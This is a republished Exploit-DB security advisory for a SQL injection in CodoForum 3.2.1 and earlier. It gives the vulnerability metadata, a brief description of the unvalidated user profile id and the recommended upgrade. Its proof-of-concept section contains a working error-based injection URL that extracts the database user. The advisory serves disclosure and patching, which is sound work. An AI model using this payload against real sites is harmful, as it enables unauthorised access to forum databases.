CodoForum 3.2.1 – SQL Injection - 体验盒子

作者： Yakir Wizman

日期： 2016-07-25

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40150/

1. Advisory Information
========================================
Title			: CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage		: https://codoforum.com/
Remotely Exploitable	: Yes
Versions Affected	: Prior to 3.2.1
Tested on		: Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability		: SQL Injection (Critical/High)
Date			: 23.07.2016
Author			: Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman


3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.


4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))


5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19